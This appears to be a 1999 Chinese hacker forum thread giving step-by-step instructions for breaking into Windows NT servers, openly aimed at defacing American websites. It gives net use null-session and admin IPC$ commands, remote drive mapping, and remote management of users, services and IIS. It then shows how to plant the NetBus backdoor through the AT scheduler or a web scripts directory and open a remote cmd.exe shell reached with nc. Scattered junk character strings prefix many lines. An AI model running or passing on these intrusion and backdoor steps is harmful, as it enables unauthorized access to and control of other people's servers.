关于“怎样进入NT主机”的几点补充

《版主页黑客工具和文章的几个问题》中提到：
7 W$ W7 o: O" Q  B4 E请教，从版主页上载得PINGER，GRINDER，LETMEIN等，却不能用，PINGER安装后，明明安装前文件有1M多，但安装完后生成的文件夹中只有PINGER。EXE，40多K，运行PINGER，设置好IP，点PING，弹出一个窗口（C++。。。），说出错，然后关闭了，何故，是不是安装有误？ 2。运行LETMEIN，弹出以下错误：连接文件LETMEIN。EXE到不存在的NETAPI32。DLL；NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件，哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等，是否要求我的操作系统也是WINNT4。0 ，应该不是吧？ 4。NC FOR NT 是否要求我的操作系统为NT，还是服务器的操作系统为NT？ 太多的问题需高手回答，我花那么多的时间和金钱下载这几M文件却不能用，实在窝囊哦， 强烈建议USAKILLER 等高手级的黑客写更多的教学文章，以提高我国黑客水平。
9 z8 H# o( i! v7 V; H" t+ u> 我的机子MMX166，WIN98，2。5G，32M内存。

黑客并不神秘，你只要了解操作系统，学习一些操作系统的弱点，辅助相关的工具，就可以成功。
你的问题是，pinger, grinder, letmein等工具必须要在NT上运行，我们强烈建议，你一定要安装NT，对于你的机器配制，和我们现在差不多，只是比你多了32M内存，2G硬盘。
其实，攻击敌站，利用其操作系统本身的工具就可以了，比如，我们在NT上攻击某服务器，该服务器为NT4.0，我们将做如下简单事情就有可能成功，假设目标NT的IP地址为111.111.111.111，做法如下：
net use \\111.111.111.111\ipc$ "" /user:""
9 k8 a8 |7 t5 [4 t; F+ fnet.exe是NT的工具文件，该命令将和目标服务器建立Null Session，如果成功，你可以查看该服务器上的共享目录：
* ~4 P& W/ |3 f1 J3 t9 Z* Y' Fnet view \\111.111.111.111
% \+ _* f% @, N9 L7 f$ m当然，如果你有该NT管理员密码，就更好办了，假设其管理员Admin密码为fuck：
  z" L/ R! F0 snet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
命令成功后，几乎所有目标NT上的配制，资源，你都可以在你本地NT上连接远程计算机来查看或修改：
- F; ]  L' X  y, \1、查看或修改远程机器上的硬盘，假如目标NT上有C、D两个硬盘：
net use x: \\111.111.111.111\c$
- d) }6 ~, I# |) e' `( e9 o/ tnet use y: \\111.111.111.111\d$
# S# Q4 m! X. q这样，目标NT上的C、D盘分别被影射为你本地的X、Y盘，你想怎么做都可以...
2、管理目标NT的用户：
+ }/ K- o9 K* H. C从“开始”->“程序”->“管理工具（公用）”->“域用户管理器”->菜单：“用户”->“选择域”
1 P# h- a+ a6 p1 S% \# ]键入\\111.111.111.111后，目标NT上的所有用户你想怎么做都可以，和管理你本地的一样
# J4 h& ^' u! b8 L- ~! x, ^2 I3、管理目标NT的服务
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
4 a$ e- T9 r  Q& u5 L# c& h: l这样你可以管理目标NT上的服务，共享目录
4、IIS管理
+ U: k- H5 E3 y; j, v选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
8 m1 Y2 `6 ?+ _8 s目标NT的FTP、WWW服务你就可以重新配置
& P1 P( V  k0 `3 }# }5、事件管理
“事件查看器”->连接到服务器->111.111.111.111
, u$ \9 l5 [8 k- h
* v, J. X; c" n- B" A+ b: ?6 v还有更多的东西，都可以用NT本身的功能来完成，这些都是95, 98所不能实现的。
0 D* s3 F2 F2 Y
$ T' I' V6 a3 O) z, U0 G当然，98,95也能做一些事情，但很麻烦，比如：
0 {" R1 p" d8 ]( n- y7 \2 S; snet use \\111.111.111.111\ipc$
8 H4 t1 K! ]" M# {& b( Z7 Z; h9 K3 Bnet use z: \\111.111.111.111\d$
" h  c, j) Q" N( ]3 W但其后不能带参数，即改用其他用户或密码，系统将用当前用户和密码去登录，如果你知道目标NT的用户或密码，重新启动95, 98，改用该用户和密码登录，方可实现，你可以连接目标NT上的共享资源，但不能进行管理，如用户、事件等
6 z+ d1 C5 {( W8 P7 ?6 `* [
: S- r" i: b. J. \: `我们强烈建议各位有心要为死难者报仇，真正的想黑霉国的站点，花点时间，装个NT吧，NT Workstation也可以！
4 k& t% A, U) T* L; c! }  U这样，你还可以了解目标机器上能有什么东东供你去用！

& j2 `) {$ |9 u  r. g4 N4 [
--------------------------------------------------------------------------------

' {% `8 ^" m* {, l" S, @>quack于1999-06-12，23:37:44
# f. ?2 C4 L6 g# E在大作《几个有关黑的问题》中提到：
1 D5 y0 F* f. M6 S4 l# |首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。

killusa于1999-06-13，03:25:15
在大作《Re: 几个有关黑的问题》中提到：
4 r* P: b7 @: o' m' I1 j
letmein.exe 暂时没有mypwd参数，十分抱歉
$ @2 I  m( a( k# E* c% b" bpinger程序，只是利用ping来寻找主机，每台NT服务器有一个主IP地址，但也可以设置多个辅助IP地址，比如有些服务器供应商，一台NT服务器上可以设置一千多个IP，每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址，就是该主机的主IP地址，所以有时显示只有IP，而无主机名。另外，有些服务器是非NT的操作系统，有时将不会显示主机名。当然，有时在服务器上进行一些设置，也会出现上面的情况。
4 o; b1 q' \" {2 d
2 B" L6 \3 B3 s$ b4 I8 d1 w  BNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序，所以，netbus.exe是不用上传的，只需在目的
) Z! n0 b% |  J; R4 U服务器上运行ntsrv.exe，而在目的服务器运行该程序有很多种方法：

7 p9 i3 h! N2 d2 a. D$ Q, G3 K- A$ m1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序，具体使用方法，可在自己的NT Dos窗口下键入以下：

C:\>net start schedule
; P. w2 F- H- j3 xSchedule 正在启动服务.....
( `' G! g# s) _1 v6 |& j2 aSchedulw 服务启动成功。
& ^" L* D4 T- k+ k" jC:\>at /?
' R& d. R7 C) h! y9 Z/ lAT 命令排定在特定的日期和时间运行某些命令和程序。
- A6 i, M  Y( @2 d+ x# s9 G运行 AT 命令之前必须先启动 Schedule 服务。
, B9 m1 r8 e* a3 u2 f
, W2 U9 E; u+ P/ r- y( ^0 k9 lAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
7 P5 v7 X8 Y- X# F2 K; _" F5 CAT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
4 ?: q6 W+ i; a' m- i/ Y* [
\\computername 指定远程计算机。 如果省略这个参数
命令会被排定在本机上运行。
0 f3 g: f9 o4 L, X+ @7 Qid 指定给排定进度命令的识别号。
0 {0 d1 ]* C: N3 a) p# V% B1 v% T
1 B/ F5 R* ?) x4 x% n, [/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。
5 C6 l+ {. D) T9 X* n* l. f/yes 用于删除所有作业，且不想在运行删除时显示确认信息 。
0 [2 t6 R1 k6 q6 b/ y. I& @& ytime 指定命令运行的时间。
/interactive 允许作业在运行时，与用户通过桌面交互。
2 Y" X) T' U/ W1 g# A; }
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
如果省略日期，则默认为在每月的本日运行。

/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。如果省略日期，则默认为在每月的本日运行。

"command" 准备运行的 Windows NT 命令或批处理文件。
# `4 M+ B0 {4 E. f+ r9 }: U# Y
' A) D: L5 d- {( D* D' JC:\>
( W- H7 _4 W% Z# ^: Q
! ~- q$ N2 \; ^& d% }2 _0 C7 Q知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe：
* w/ n, [# i5 p; l/ F1 利用管理员登陆到目的服务器，方法为： net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后：
, H) D. ^# H4 R, qat \\x.x.x.x 00:00 ntsrv.exe /port:64321
其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接！具体使用可参照 "How to get in nt"，比如第一种方法，你想要在目的服务器运行 LEGION，可以利用netbus得上传功能，将LEGION上传至目的服务器，再用netbus的"Start program"，键入完整路径的LEGION运行程序，就ok了！第二种方法是利用netbus的“App redirect”功能，启动远程telnet服务，如下：在netbus中击“App redirect”，键入"C:\>winnt\system32\cmd.exe"，Port为：4321，服务就启动了，然后在本地运行：nc x.x.x.x 4321，出现dos启动的画面就表示连接成功：
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>

2、利用web启动ntsrv.exe或其他程序在目的服务器

) }7 Y* M1 Q; Q. S将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录，如cgi-bin或scripts，然后在浏览器键入url如：
0 j# O; D9 U" V* `) ghttp://x.x.x.x/scripts/ntsrv.exe /port:64321
" Y- ?4 C7 s# U' J* @, c$ J1 ^或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
该程序就启动了
' ]3 _) q8 @# o  Z8 i3 Q8 S# E
  d5 `3 U5 c$ _  @: @$ a1 M我只提这几中方法！
9 K1 w0 ?1 y9 Q, z. c& E要成功，必须打好基础工，对操作系统充分了解!
8 Q& U+ A9 }- i